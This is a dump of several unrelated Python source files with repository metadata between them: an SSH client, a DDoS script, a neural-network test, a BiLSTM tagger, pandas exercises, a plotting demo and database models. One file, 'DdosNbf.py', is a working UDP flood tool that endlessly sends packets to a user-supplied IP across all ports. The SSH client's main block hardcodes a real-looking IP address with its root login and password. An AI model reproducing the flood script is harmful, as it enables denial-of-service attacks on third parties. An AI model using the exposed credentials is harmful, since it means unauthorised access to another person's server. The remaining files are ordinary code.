def __init__(self):
self.ssh_client = SSHClient()
# 连接登录
def connect(self, hostname, port, username, password):
try:
print('正在远程连接主机:%s' % hostname)
self.ssh_client.set_missing_host_key_policy(AutoAddPolicy())
self.ssh_client.connect(hostname=hostname, port=port, username=username, password=password)
return [True, '']
except Exception as e:
print('连接出错了%s' % e)
return [False, '%s' % e]
# 远程执行命令
def exec_command(self, command):
try:
print('正在执行命令:'+ command)
stdin, stdout, stderr = self.ssh_client.exec_command(command)
print('命令输出:')
print(stdout.read()) # 读取命令输出
return [True, tuple]
except Exception as e:
print('执行命:%s令出错' % command)
return [False,'%s' % e]
# 下载文件(非目录文件)
def download_file(self, remotepath, localpath):
try:
localpath = os.path.abspath(localpath)
localpath = localpath.replace('\t', '/t').replace('\n', '/n').replace('\r', '/r').replace('\b', '/b') # 转换特殊字符
localpath = localpath.replace('\f', '/f')
print('转换后的本地目标路径为:%s' % localpath)
head, tail = os.path.split(localpath)
if not tail:
print('下载文件:%s 到本地:%s失败,本地文件名不能为空' % (remotepath, localpath))
return [False, '下载文件:%s 到本地:%s失败,本地文件名不能为空' % (remotepath, localpath)]
if not os.path.exists(head):
print('本地路径:%s不存在,正在创建目录' % head)
# OtherTools().mkdirs_once_many(head)
sftp_client = self.ssh_client.open_sftp()
print('正在下载远程文件:%s 到本地:%s' % (remotepath, localpath))
sftp_client.get(remotepath, localpath)
sftp_client.close()
return [True, '']
except Exception as e:
print('下载文件:%s 到本地:%s 出错:%s' % (remotepath, localpath, e))
return [False, '下载文件:%s 到本地:%s 出错:%s' % (remotepath, localpath, e)]
# 上传文件(非目录文件)
def upload_file(self, localpath, remotepath):
try:
localpath = localpath.rstrip('\\').rstrip('/')
localpath = localpath.replace('\t', '/t').replace('\n', '/n').replace('\r', '/r').replace('\b', '/b') # 转换特殊字符
localpath = localpath.replace('\f', '/f')
localpath = os.path.abspath(localpath)
print('转换后的本地文件路径为:%s' % localpath)
remotepath = remotepath.rstrip('\\').rstrip('/')
head, tail = os.path.split(localpath)
if not tail:
print('上传文件:%s 到远程:%s失败,本地文件名不能为空' % (localpath, remotepath))
return [False, '上传文件:%s 到远程:%s失败,本地文件名不能为空' % (localpath, remotepath)]
if not os.path.exists(head):
print( '上传文件:%s 到远程:%s失败,父路径不存在' % (localpath, remotepath, head))
return [False, '上传文件:%s 到远程:%s失败,父路径不存在' % (localpath, remotepath, head)]
if not (remotepath.startswith('/') or remotepath.startswith('.')):
print('上传文件:%s 到远程:%s失败,远程路径填写不规范%s' % (localpath, remotepath,remotepath))
return [False, '上传文件:%s 到远程:%s失败,远程路径填写不规范%s' % (localpath, remotepath,remotepath)]
sftp_client = self.ssh_client.open_sftp()
head, tail = os.path.split(remotepath)
head = sftp_client.normalize(head) # 规范化路径
remotepath = head + '/' + tail
print('规范化后的远程目标路径:', remotepath)
print('正在上传文件:%s 到远程:%s' % (localpath, remotepath))
sftp_client.put(localpath, remotepath)
sftp_client.close()
return [True, '']
except Exception as e:
print('上传文件:%s 到远程:%s 出错:%s' % (localpath, remotepath, e))
return [False, '上传文件:%s 到远程:%s 出错:%s' % (localpath, remotepath, e)]
def close(self):
self.ssh_client.close()
if __name__ == '__main__':
client = MySSHClient()
client.connect('39.105.161.244',22,'root','Aisjl953923')
while True:
command = input(str)
print(command)
client.exec_command(command) | [
"shijialei"
] | shijialei |
6e22b9181e9dcec7bac28112f25850dd293ce55f | cfca6d26ffc4a2a968a3c851dcd1e78669080789 | /DdosNbf.py | 7b37129867db145dc528128ab83893225373fc61 | [] | no_license | NBFNusantaraBlackHat/DDoS-Attack | 18371b2b0d04713d97a21ab801b8fec97ace83ad | 3f748a9dc06de12d4e205deb05a971c7d07c5cb8 | refs/heads/master | 2020-04-08T07:48:24.629008 | 2018-11-26T10:47:39 | 2018-11-26T10:47:39 | 159,152,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,195 | py | import sys
import os
import time
import socket
import random
#Code Time
from datetime import datetime
now = datetime.now()
hour = now.hour
minute = now.minute
day = now.day
month = now.month
year = now.year
##############
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
bytes = random._urandom(1490)
#############
os.system("clear")
os.system("figlet DDos Attack")
os.system("figlet By: NBF")
print
print "Author : NBF(NusantaraBlackHat)"
print "You Tube : GAK PUNYA CHANEL YOUTUBE NGENTOD"
print "github : https://github.com/NBFNusantaraBlackHat"
print "Facebook : https://www.facebook.com/Cari Sampe Ketemu"
print
ip = raw_input("IP Target : ")
port = input("Port : ")
os.system("clear")
os.system("figlet Attack Starting")
print "[ ] 0% "
time.sleep(5)
print "[===== ] 25%"
time.sleep(5)
print "[========== ] 50%"
time.sleep(5)
print "[=============== ] 75%"
time.sleep(5)
print "[====================] 100%"
time.sleep(3)
sent = 0
while True:
sock.sendto(bytes, (ip,port))
sent = sent + 1
port = port + 1
print "Sent %s packet to %s throught port:%s"%(sent,ip,port)
if port == 65534:
port = 1 | [
"noreply@github.com"
] | noreply@github.com |
6bcfdaa018b7e760ee67c1fe72ae9bf3302e7b12 | f6120ec98e4df5a5de7c1dec9105c3c382c5579e | /other/tbdaspro v0.5/package/addwahana.py | 4918099ae472bd3b50e2d694944d1013dd8d4741 | [] | no_license | Lock1/IF1210-Daspro | 3b63207b74e27bb6442992454b179604db969f1c | 289efc5ea7b58bcc7253a6fcec6e34ebd294630d | refs/heads/master | 2023-03-25T08:18:47.824967 | 2020-10-16T16:25:30 | 2020-10-16T16:25:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 815 | py | # add wahana
# pre defined xinput() and update()
def addWahana():
# no restriction, filter admin / non admin at main loop
# variables
newID = ""
newname = ""
newcost = 0
newage = ""
newheight = ""
# Meminta input user
print("Masukkan Informasi Wahana yang ditambahkan:")
print("Masukkan ID Wahana: ", end="")
newID = xinput()
print() # newline
print("Masukkan Nama Wahana: ", end="")
newName = xinput()
print()
print("Masukkan Harga Tiket: ", end="")
newcost = xinput()
print()
print("Batasan umur: ", end="")
newage = xinput()
print()
print("Batasan tinggi badan: ", end="")
newheight = xinput()
print("\n")
print("Info wahana telah ditambahkan!")
# update
# call update()
# end of function
| [
"tanurrizaldi@gmail.com"
] | tanurrizaldi@gmail.com |
b9c65a3475c55af3ee73b29aea7de9b7bd2db0bd | 01ad98b8bc78f894b3fb0fd7342a7588ca4089af | /DAE-SSIM-test.py | 52cae6e80d168f83dbe7e6f64bb0a819025585b8 | [] | no_license | terrytykuo/cocktail | ed526e3ba320319ecd70556d5bea2bbada870a80 | e24f8e121184749b7e7de31c18f706dffc816748 | refs/heads/master | 2022-11-04T20:17:13.424020 | 2019-02-10T11:56:47 | 2019-02-10T11:56:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,900 | py | import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torch.utils.data import Dataset, DataLoader
import torch.utils.data as data
import torch.nn.init as init
import pytorch_ssim
import torchvision
import torchvision.transforms as transforms
from torch.autograd import Variable
import matplotlib.pyplot as plt
import pickle
import os
import json
import numpy as np
import gc
import cv2
epoch = 5
bs = 10
#=============================================
# Define Functions
#=============================================
def odd(w):
return list(np.arange(1, w, step=2, dtype='long'))
def even(w):
return list(np.arange(0, w, step=2, dtype='long'))
def white(x):
fw, tw = x.shape[1], x.shape[2]
first = F.relu(torch.normal(mean=torch.zeros(fw, tw), std=torch.ones(fw, tw)) ) * 0.05
second_seed = F.relu(torch.normal(mean=torch.zeros(fw//2, tw//2), std=torch.ones(fw//2, tw//2))) * 0.03
second = torch.zeros(fw, tw)
row_x = torch.zeros(int(fw//2), tw)
# row_x = torch.zeros(int(fw/2), tw)
row_x[:, odd(tw)] = second_seed
row_x[:, even(tw)] = second_seed
second[odd(fw), :] = row_x
second[even(fw), :] = row_x
return second + first
#=============================================
# path
#=============================================
server = False
root_dir = '/home/tk/Documents/'
if server == True:
root_dir = '/home/guotingyou/cocktail_phase2/'
clean_dir = root_dir + 'clean/'
# mix_dir = root_dir + 'mix/'
# clean_label_dir = root_dir + 'clean_labels/'
# mix_label_dir = root_dir + 'mix_labels/'
cleanfolder = os.listdir(clean_dir)
cleanfolder.sort()
# mixfolder = os.listdir(mix_dir)
# mixfolder.sort()
clean_list = []
# mix_list = []
#=============================================
# Define Datasets
#=============================================
class MSourceDataSet(Dataset):
def __init__(self, clean_dir):
# Overfitting single block
with open(clean_dir + 'clean12.json') as f:
clean_list.append(torch.Tensor(json.load(f)))
cleanblock = torch.cat(clean_list, 0)
# mixblock = torch.cat(mix_list, 0)
self.spec = cleanblock
def __len__(self):
return self.spec.shape[0]
def __getitem__(self, index):
spec = self.spec[index]
return spec
#=============================================
# Define Dataloader
#=============================================
testset = MSourceDataSet(clean_dir)
trainloader = torch.utils.data.DataLoader(dataset = testset,
batch_size = bs,
shuffle = True)
#=============================================
# Model
#=============================================
''' ResBlock '''
class ResBlock(nn.Module):
def __init__(self, channels_in, channels_out):
super(ResBlock, self).__init__()
self.channels_in = channels_in
self.channels_out = channels_out
self.conv1 = nn.Conv2d(in_channels=channels_in, out_channels=channels_out, kernel_size=(3,3), padding=1)
self.conv2 = nn.Conv2d(in_channels=channels_out, out_channels=channels_out, kernel_size=(3,3), padding=1)
def forward(self, x):
if self.channels_out > self.channels_in:
x1 = F.relu(self.conv1(x))
x1 = self.conv2(x1)
x = self.sizematch(self.channels_in, self.channels_out, x)
return F.relu(x + x1)
elif self.channels_out < self.channels_in:
x = F.relu(self.conv1(x))
x1 = self.conv2(x)
x = x + x1
return F.relu(x)
else:
x1 = F.relu(self.conv1(x))
x1 = self.conv2(x1)
x = x + x1
return F.relu(x)
def sizematch(self, channels_in, channels_out, x):
zeros = torch.zeros( (x.size()[0], channels_out - channels_in, x.shape[2], x.shape[3]), dtype = torch.float32)
return torch.cat((x, zeros), dim=1)
class ResTranspose(nn.Module):
def __init__(self, channels_in, channels_out):
super(ResTranspose, self).__init__()
self.channels_in = channels_in
self.channels_out = channels_out
self.deconv1 = nn.ConvTranspose2d(in_channels=channels_in, out_channels=channels_out, kernel_size=(2,2), stride=2)
self.deconv2 = nn.Conv2d(in_channels=channels_out, out_channels=channels_out, kernel_size=(3,3), padding=1)
def forward(self, x):
# cin = cout
x1 = F.relu(self.deconv1(x))
x1 = self.deconv2(x1)
x = self.sizematch(x)
return F.relu(x + x1)
def sizematch(self, x):
# expand
x2 = torch.zeros(x.shape[0], self.channels_in, x.shape[2]*2, x.shape[3]*2)
row_x = torch.zeros(x.shape[0], self.channels_in, x.shape[2], 2*x.shape[3])
row_x[:,:,:,odd(x.shape[3]*2)] = x
row_x[:,:,:,even(x.shape[3]*2)] = x
x2[:,:, odd(x.shape[2]*2),:] = row_x
x2[:,:,even(x.shape[2]*2),:] = row_x
return x2
def initialize(m):
if isinstance(m, nn.Conv2d):
init.xavier_normal_(m.weight)
init.constant_(m.bias, 0)
if isinstance(m, nn.ConvTranspose2d):
init.xavier_normal_(m.weight)
class ResDAE(nn.Module):
def __init__(self):
super(ResDAE, self).__init__()
# 128x128x1
self.upward_net1 = nn.Sequential(
ResBlock(1, 8),
ResBlock(8, 8),
ResBlock(8, 8),
nn.BatchNorm2d(8),
)
# 64x64x8
self.upward_net2 = nn.Sequential(
nn.Conv2d(in_channels=8, out_channels=8, kernel_size=(2,2), stride=2),
nn.ReLU(),
ResBlock(8, 8),
ResBlock(8, 16),
ResBlock(16, 16),
nn.BatchNorm2d(16),
)
# 32x32x16
self.upward_net3 = nn.Sequential(
nn.Conv2d(in_channels=16, out_channels=16, kernel_size=(2,2), stride=2),
nn.ReLU(),
ResBlock(16, 16),
ResBlock(16, 32),
ResBlock(32, 32),
nn.BatchNorm2d(32),
)
# 16x16x32
self.upward_net4 = nn.Sequential(
nn.Conv2d(in_channels=32, out_channels=32, kernel_size=(2,2), stride=2),
nn.ReLU(),
ResBlock(32, 32),
ResBlock(32, 64),
ResBlock(64, 64),
nn.BatchNorm2d(64),
)
# 8x8x64
self.upward_net5 = nn.Sequential(
nn.Conv2d(in_channels=64, out_channels=64, kernel_size=(2,2), stride=2),
nn.ReLU(),
ResBlock(64, 64),
ResBlock(64, 128),
ResBlock(128, 128),
nn.BatchNorm2d(128),
)
# 4x4x128
self.upward_net6 = nn.Sequential(
nn.Conv2d(in_channels=128, out_channels=128, kernel_size=(2,2), stride=2),
nn.ReLU(),
ResBlock(128, 128),
ResBlock(128, 256),
ResBlock(256, 256),
nn.BatchNorm2d(256),
)
# 2x2x256
self.upward_net7 = nn.Sequential(
nn.Conv2d(in_channels=256, out_channels=256, kernel_size=(2,2), stride=2),
nn.ReLU(),
ResBlock(256, 256),
ResBlock(256, 512),
ResBlock(512, 512),
nn.BatchNorm2d(512),
)
self.fc1 = nn.Linear(4096, 512)
self.fc2 = nn.Linear(512, 4096)
# 1x1x512
self.downward_net7 = nn.Sequential(
ResBlock(512, 512),
ResBlock(512, 256),
ResBlock(256, 256),
ResTranspose(256, 256),
# nn.ConvTranspose2d(256, 256, kernel_size = (2,2), stride = 2),
nn.BatchNorm2d(256),
)
# 2x2x256
self.downward_net6 = nn.Sequential(
# 8x8x64
ResBlock(256, 256),
ResBlock(256, 128),
ResBlock(128, 128),
ResTranspose(128, 128),
# nn.ConvTranspose2d(128, 128, kernel_size = (2,2), stride = 2),
nn.BatchNorm2d(128),
)
# 4x4x128
# cat -> 4x4x256
self.uconv5 = nn.Conv2d(256, 128, kernel_size=(3,3), padding=(1,1))
# 4x4x128
self.downward_net5 = nn.Sequential(
ResBlock(128, 128),
ResBlock(128, 64),
ResBlock(64, 64),
ResTranspose(64, 64),
# nn.ConvTranspose2d(64, 64, kernel_size = (2,2), stride = 2),
nn.BatchNorm2d(64),
)
# 8x8x64
# cat -> 8x8x128
self.uconv4 = nn.Conv2d(128, 64, kernel_size=(3,3), padding=(1,1))
# 8x8x64
self.downward_net4 = nn.Sequential(
ResBlock(64, 64),
ResBlock(64, 32),
ResBlock(32, 32),
ResTranspose(32, 32),
# nn.ConvTranspose2d(32, 32, kernel_size = (2,2), stride = 2),
nn.BatchNorm2d(32),
)
# 16x16x32
# cat -> 16x16x64
self.uconv3 = nn.Conv2d(64, 32, kernel_size=(3,3), padding=(1,1))
# 16x16x32
self.downward_net3 = nn.Sequential(
ResBlock(32, 32),
ResBlock(32, 16),
ResBlock(16, 16),
ResTranspose(16, 16),
# nn.ConvTranspose2d(16, 16, kernel_size = (2,2), stride = 2),
nn.BatchNorm2d(16),
)
# 32x32x16
# cat -> 32x32x32
self.uconv2 = nn.Conv2d(32, 16, kernel_size=(3,3), padding=(1,1))
# 32x32x16
self.downward_net2 = nn.Sequential(
ResBlock(16, 16),
ResBlock(16, 8),
ResBlock(8, 8),
ResTranspose(8, 8),
# nn.ConvTranspose2d(8, 8, kernel_size = (2,2), stride = 2),
nn.BatchNorm2d(8),
)
# 64x64x8
self.downward_net1 = nn.Sequential(
ResBlock(8, 8),
ResBlock(8, 4),
ResBlock(4, 1),
ResBlock(1, 1),
nn.BatchNorm2d(1),
)
# 128x128x1
self.apply(initialize)
def upward(self, x, a7=None, a6=None, a5=None, a4=None, a3=None, a2=None):
x = x.view(bs, 1, 256, 128)
# 1x128x128
# print ("initial", x.shape)
x = self.upward_net1(x)
# print ("after conv1", x.shape)
# 8x64x64
x = self.upward_net2(x)
if a2 is not None: x = x * a2
self.x2 = x
# print ("after conv2", x.shape)
# 16x32x32
x = self.upward_net3(x)
if a3 is not None: x = x * a3
self.x3 = x
# print ("after conv3", x.shape)
# 32x16x16
x = self.upward_net4(x)
if a4 is not None: x = x * a4
self.x4 = x
# print ("after conv4", x.shape)
# 64x8x8
x = self.upward_net5(x)
if a5 is not None: x = x * a5
self.x5 = x
# print ("after conv5", x.shape)
# 128x4x4
x = self.upward_net6(x)
if a6 is not None: x = x * a6
# print ("after conv6", x.shape)
# 256x2x2
x = self.upward_net7(x)
if a7 is not None: x = x * a7
# print ("after conv7", x.shape)
x = x.view(bs, 1, -1)
x = self.fc1(x)
return x
def downward(self, y, shortcut= True):
# print ("begin to downward, y.shape = ", y.shape)
y = self.fc2(y)
y = y.view(bs, 512, 4, 2)
# 512x2x2
y = self.downward_net7(y)
# print ("after down7", y.shape)
# 256x4x4
y = self.downward_net6(y)
# print ("after down6", y.shape)
# 128x8x8
if shortcut:
y = torch.cat((y, self.x5), 1)
y = F.relu(self.uconv5(y))
y = self.downward_net5(y)
# print ("after down5", y.shape)
# 64x16x16
if shortcut:
y = torch.cat((y, self.x4), 1)
y = F.relu(self.uconv4(y))
y = self.downward_net4(y)
# print ("after down4", y.shape)
# 32x32x32
if shortcut:
y = torch.cat((y, self.x3), 1)
y = F.relu(self.uconv3(y))
y = self.downward_net3(y)
# print ("after down3", y.shape)
# 16x64x64
if shortcut:
y = torch.cat((y, self.x2), 1)
y = F.relu(self.uconv2(y))
y = self.downward_net2(y)
# print ("after down2", y.shape)
# 8x128x128
y = self.downward_net1(y)
# print ("after down1", y.shape)
# 1x128x128
return y
#model = ResDAE()
model = torch.load(root_dir + 'recover/SSIM/DAE_SSIM.pkl')
# print (model)
#=============================================
# testing
#=============================================
criterion = pytorch_ssim.SSIM()
model.eval()
for epo in range(epoch):
for i, data in enumerate(trainloader, 0):
inputs = data
inputs = Variable(inputs)
top = model.upward(inputs + white(inputs))
outputs = model.downward(top, shortcut = True)
inputs = inputs.view(bs, 1, 256, 128)
outputs = outputs.view(bs, 1, 256, 128)
#with open ( root_dir + 'recover/L1loss_FC/recover_pic_epo_' + str(epo), 'w') as f:
# json.dump(outputs.tolist(), f)
loss = - criterion(outputs, inputs)
ssim_value = - loss.data.item()
if i % 20 == 0:
inn = inputs[0].view(256, 128).detach().numpy() * 255
cv2.imwrite("/home/tk/Documents/recover/SSIM_test/" + str(epo) + "_" + str(i) + ".png", inn)
out = outputs[0].view(256, 128).detach().numpy() * 255
cv2.imwrite("/home/tk/Documents/recover/SSIM_test/" + str(epo) + "_" + str(i) + "_re.png", out)
| [
"oldiegoodie99@gmail.com"
] | oldiegoodie99@gmail.com |
be5ba2c6a82625b16986607b6b57ba1f589692b2 | 7443274ce4d517ebe5148f47d5495f4653e34c30 | /bilstm.py | 10a573d33dc1e753e71844186cff43aa04bc6fde | [] | no_license | shirayair/Bilstm-Tagger | d7dd5b4a9bdbb7738883f361ccca49d872c61ee1 | d505e7bddf08287ff0038e45e8779a108abb9882 | refs/heads/main | 2023-07-01T04:49:37.040694 | 2021-07-13T14:30:37 | 2021-07-13T14:30:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,042 | py | import torch
from torch import nn as nn
from torch.nn.utils.rnn import pack_padded_sequence, pad_packed_sequence, pad_sequence
from train_biLSTM import train_and_eval_model
from process_data_3 import process_data
EMBEDDING_DIM = 50
HIDDEN_LAYER_LSTM = 100
EPOCHS = 5
LR = 0.01
BATCH_SIZE = 500
DEV_BATCH_SIZE = 50
class BiLSTM(nn.Module):
def __init__(self, output_dim, vocab_size):
super(BiLSTM, self).__init__()
torch.manual_seed(3)
self.hidden_layer_lstm = HIDDEN_LAYER_LSTM
self.output_dim = output_dim
self.embed_dim = EMBEDDING_DIM
self.seq_pad_idx, self.label_pad_idx = 0, 0
self.vocab_size = vocab_size
self.lstm, self.embed, self.mlp = self.build_model()
nn.init.uniform_(self.embed.weight, -1.0, 1.0)
def build_model(self):
# whenever the embedding sees the padding index it'll make the whole vector zeros
word_embedding = nn.Embedding(
num_embeddings=self.vocab_size + 1,
embedding_dim=self.embed_dim,
padding_idx=self.seq_pad_idx
)
# design LSTM
lstm = nn.LSTM(
input_size=self.embed_dim,
hidden_size=self.hidden_layer_lstm,
bidirectional=True,
num_layers=2
)
# output layer which projects back to tag space
mlp = nn.Sequential(nn.Linear(2 * self.hidden_layer_lstm, self.output_dim),
nn.Tanh(), nn.Softmax(dim=1))
return lstm, word_embedding, mlp
def forward(self, x, y):
lens = list(map(len, x))
x = pad_sequence(x, batch_first=True, padding_value=self.seq_pad_idx)
y = pad_sequence(y, batch_first=True, padding_value=self.label_pad_idx)
x = self.embed(x)
x = pack_padded_sequence(x, lens, batch_first=True, enforce_sorted=False)
# now run through LSTM
output, (c0, ho) = self.lstm(x)
# undo the packing operation
x, lens = pad_packed_sequence(output, batch_first=True)
Y_hats = self.mlp(x)
return Y_hats, y
def save(self, path):
torch.save(self.state_dict(), path)
def load(self, path):
state_dict = torch.load(path)
self.load_state_dict(state_dict)
if __name__ == "__main__":
isPos = True
train_loader, valid_loader, vocab_sample, vocab_label, word_to_idx, labels_to_idx = process_data(isPos, BATCH_SIZE,
DEV_BATCH_SIZE)
if not isPos:
weights = [1.0, 1.0, 0.1, 1.0, 1.0, 1.0]
class_weights = torch.tensor(weights)
loss_func = nn.CrossEntropyLoss(weight=class_weights, ignore_index=labels_to_idx['PAD'], reduction='mean')
else:
loss_func = nn.CrossEntropyLoss(ignore_index=labels_to_idx['PAD'], reduction='mean')
model = BiLSTM(len(labels_to_idx), len(word_to_idx))
model = train_and_eval_model(model, train_loader, valid_loader, loss_func, labels_to_idx, EPOCHS, LR)
| [
"noreply@github.com"
] | noreply@github.com |
4c7546e287b51fcb292b3b1b17e4cab62b4f0e97 | 7c5fa7d9722f59fce5e3336f7c0e9edd084c13be | /WorldBankData.py | b03f0305cfa7d2025d227bc40bc03ce356db4d50 | [] | no_license | ytnvj2/Python-Practice | d8f19e6d76277a6071c56a635de79ba0bd180d13 | 591eccf1421b4a1811a113d94e1b059bb696c50f | refs/heads/master | 2021-09-08T20:39:33.298643 | 2018-03-12T03:50:48 | 2018-03-12T03:50:48 | 124,785,929 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,433 | py | # Zip lists: zipped_lists
zipped_lists = zip(feature_names,row_vals)
# Create a dictionary: rs_dict
rs_dict = dict(zipped_lists)
# Print the dictionary
print(rs_dict)
# Define lists2dict()
def lists2dict(list1, list2):
"""Return a dictionary where list1 provides
the keys and list2 provides the values."""
# Zip lists: zipped_lists
zipped_lists = zip(list1, list2)
# Create a dictionary: rs_dict
rs_dict = dict(zipped_lists)
# Return the dictionary
return rs_dict
# Call lists2dict: rs_fxn
rs_fxn = lists2dict(feature_names,row_vals)
# Print rs_fxn
print(rs_fxn)
# Import the pandas package
import pandas as pd
# Turn list of lists into list of dicts: list_of_dicts
list_of_dicts = [lists2dict(feature_names, sublist) for sublist in row_lists]
# Turn list of dicts into a DataFrame: df
df = pd.DataFrame(list_of_dicts)
# Print the head of the DataFrame
print(df.head())
# Open a connection to the file
with open('world_dev_ind.csv') as file:
# Skip the column names
file.readline()
# Initialize an empty dictionary: counts_dict
counts_dict = {}
# Process only the first 1000 rows
for j in range(1000):
# Split the current line into a list: line
line = file.readline().split(',')
# Get the value for the first column: first_col
first_col = line[0]
# If the column value is in the dict, increment its value
if first_col in counts_dict.keys():
counts_dict[first_col] += 1
# Else, add to the dict and set value to 1
else:
counts_dict[first_col] = 1
# Print the resulting dictionary
print(counts_dict)
# Define read_large_file()
def read_large_file(file_object):
"""A generator function to read a large file lazily."""
# Loop indefinitely until the end of the file
while True:
# Read a line from the file: data
data = file_object.readline();
# Break if this is the end of the file
if not data:
break
# Yield the line of data
yield data
# Open a connection to the file
with open('world_dev_ind.csv') as file:
# Create a generator object for the file: gen_file
gen_file = read_large_file(file)
# Print the first three lines of the file
print(next(gen_file))
print(next(gen_file))
print(next(gen_file))
# Initialize an empty dictionary: counts_dict
counts_dict = {}
# Open a connection to the file
with open('world_dev_ind.csv') as file:
# Iterate over the generator from read_large_file()
for line in read_large_file(file):
row = line.split(',')
first_col = row[0]
if first_col in counts_dict.keys():
counts_dict[first_col] += 1
else:
counts_dict[first_col] = 1
# Print
print(counts_dict)
#Reading from chunksize
# Import the pandas package
import pandas as pd
# Initialize reader object: df_reader
df_reader = pd.read_csv('ind_pop.csv', chunksize=10)
# Print two chunks
print(next(df_reader))
print(next(df_reader))
# Initialize reader object: urb_pop_reader
urb_pop_reader = pd.read_csv('ind_pop_data.csv', chunksize=1000)
# Get the first DataFrame chunk: df_urb_pop
df_urb_pop = next(urb_pop_reader)
# Check out the head of the DataFrame
print(df_urb_pop.head())
# Check out specific country: df_pop_ceb
df_pop_ceb = df_urb_pop[df_urb_pop['CountryCode']=='CEB']
# Zip DataFrame columns of interest: pops
pops = zip(df_pop_ceb['Total Population'], df_pop_ceb['Urban population (% of total)'])
# Turn zip object into list: pops_list
pops_list = list(pops)
# Print pops_list
print(pops_list)
# Initialize reader object: urb_pop_reader
urb_pop_reader = pd.read_csv('ind_pop_data.csv', chunksize=1000)
# Get the first DataFrame chunk: df_urb_pop
df_urb_pop = next(urb_pop_reader)
# Check out specific country: df_pop_ceb
df_pop_ceb = df_urb_pop[df_urb_pop['CountryCode'] == 'CEB']
# Zip DataFrame columns of interest: pops
pops = zip(df_pop_ceb['Total Population'],
df_pop_ceb['Urban population (% of total)'])
# Turn zip object into list: pops_list
pops_list = list(pops)
# Use list comprehension to create new DataFrame column 'Total Urban Population'
df_pop_ceb['Total Urban Population'] = [int((tup[0]*tup[1])/100) for tup in pops_list]
# Plot urban population data
df_pop_ceb.plot(kind='scatter', x='Year', y='Total Urban Population')
plt.show()
| [
"ytn.vj2@gmail.com"
] | ytn.vj2@gmail.com |
f3bb6fb019a485fe0bec264817b74915c0530643 | 7323b8039f47c0457ae90173c963549b7d1e6823 | /sandbox/src1/histdemo.py | a8514133c69af80b7c5f510d812d969b0da96add | [
"LicenseRef-scancode-public-domain",
"BSD-2-Clause"
] | permissive | sniemi/SamPy | abce0fb941f011a3264a8d74c25b522d6732173d | e048756feca67197cf5f995afd7d75d8286e017b | refs/heads/master | 2020-05-27T18:04:27.156194 | 2018-12-13T21:19:55 | 2018-12-13T21:19:55 | 31,713,784 | 5 | 2 | null | null | null | null | UTF-8 | Python | false | false | 361 | py | from matplotlib import rcParams
from pylab import *
mu, sigma = 100, 15
x = mu + sigma*randn(10000)
# the histogram of the data
n, bins, patches = hist(x, 100, normed=1)
# add a 'best fit' line
y = normpdf(bins, mu, sigma)
l = plot(bins, y, 'r--', linewidth=2)
xlim(40, 160)
xlabel('Smarts')
ylabel('P')
title(r'$\rm{IQ:}\/ \mu=100,\/ \sigma=15$')
show()
| [
"niemi@stsci.edu"
] | niemi@stsci.edu |
f54ac71cf009afa94e7ef8de543512fa581e50d4 | 86999093f510e29d3a301a10115c5516bd41e2db | /eg/models_comment.py | 4e33b5e59a83a8a6d806385f9be770febc297ed0 | [] | no_license | samuelmartinsa/EG | 9dcb00a80bfd7ad1ec5e44567c385736f7576908 | 33ad4c7aa33d964a1b3133b9a6b178ffd1771717 | refs/heads/master | 2021-01-21T11:30:55.313976 | 2017-08-31T13:58:02 | 2017-08-31T13:58:02 | 102,003,676 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 18,978 | py |
import datetime
from sqlalchemy import Table, Column, Integer, String, DateTime, Boolean, Text, ForeignKey
from sqlalchemy.types import REAL
from sqlalchemy.orm import relationship, backref
from sqlalchemy.ext.declarative import declarative_base
from db import Base
from sqlalchemy.schema import ForeignKeyConstraint, Index, UniqueConstraint
from config import config
from db import db_session, init_db
# Add by coco
#from picgencol import picgencol
from fractale_new import fractale_new
import random
# added by sam
#TABLENAME = config.get('Database Parameters', 'table_name')
TABLE_GAME = config.get('Database Parameters', 'table_game')
TABLE_GAMESET = config.get('Database Parameters', 'table_gameset')
TABLE_PARTICIPANT = config.get('Database Parameters', 'table_participant')
TABLE_USER = config.get('Database Parameters', 'table_user')
TABLE_GAME_PARTICIPANT = config.get('Database Parameters', 'table_game_participant')
TABLE_GAMESET_PARTICIPANT = config.get('Database Parameters', 'table_gameset_participant')
TABLE_ROUND = config.get('Database Parameters', 'table_round')
TABLE_CHOICE = config.get('Database Parameters', 'table_choice')
TABLE_DECISION = config.get('Database Parameters', 'table_decision')
TABLE_QUESTIONNAIRE = config.get('Database Parameters', 'table_questionnaire')
TABLE_CODE = config.get('Database Parameters', 'table_code')
TABLE_IMAGE = config.get('Database Parameters', 'table_image') # Added by coco
CODE_VERSION = config.get('Task Parameters', 'code_version')
# association tables
gameset_participant_table = Table(TABLE_GAMESET_PARTICIPANT, Base.metadata,
Column('gamesetid', Integer, ForeignKey(TABLE_GAMESET+'.id',
use_alter=True, name='fk_gameset_part_game_id')),
Column('assignmentId', String(128), nullable=False),
Column('workerId', String(128), nullable=False) ,
ForeignKeyConstraint(['assignmentId','workerId'],
[TABLE_PARTICIPANT+'.assignmentId',
TABLE_PARTICIPANT+'.workerId'],
use_alter=True, name='fk_gameset_part_part_id',
onupdate="CASCADE", ondelete="CASCADE")
)
Index('idx_assignment_worker_gameset', gameset_participant_table.c.assignmentId, gameset_participant_table.c.workerId),
game_participant_table = Table(TABLE_GAME_PARTICIPANT, Base.metadata,
Column('gameid', Integer, ForeignKey(TABLE_GAME+'.id',
use_alter=True, name='fk_game_part_game_id')),
Column('assignmentId', String(128), nullable=False),
Column('workerId', String(128), nullable=False) ,
ForeignKeyConstraint(['assignmentId','workerId'],
[TABLE_PARTICIPANT+'.assignmentId',
TABLE_PARTICIPANT+'.workerId'],
use_alter=True, name='fk_game_part_part_id',
onupdate="CASCADE", ondelete="CASCADE")
)
Index('idx_assignment_worker', game_participant_table.c.assignmentId, game_participant_table.c.workerId),
class User(Base):
"""
Object representation of a participant in the database.
"""
__tablename__ = TABLE_USER
# Status codes
ALLOCATED = 1
CONSENTED = 2
ASSESSED = 3
INSTRUCTED = 4
id = Column(Integer, primary_key=True)
username = Column(String(128))
password = Column(String(128))
worker = relationship("Participant",backref="user",cascade="all,delete")
lastvisit = Column(DateTime, nullable=True)
sessionId = Column(String(128), nullable=True)
status = Column(Integer, default = 1)
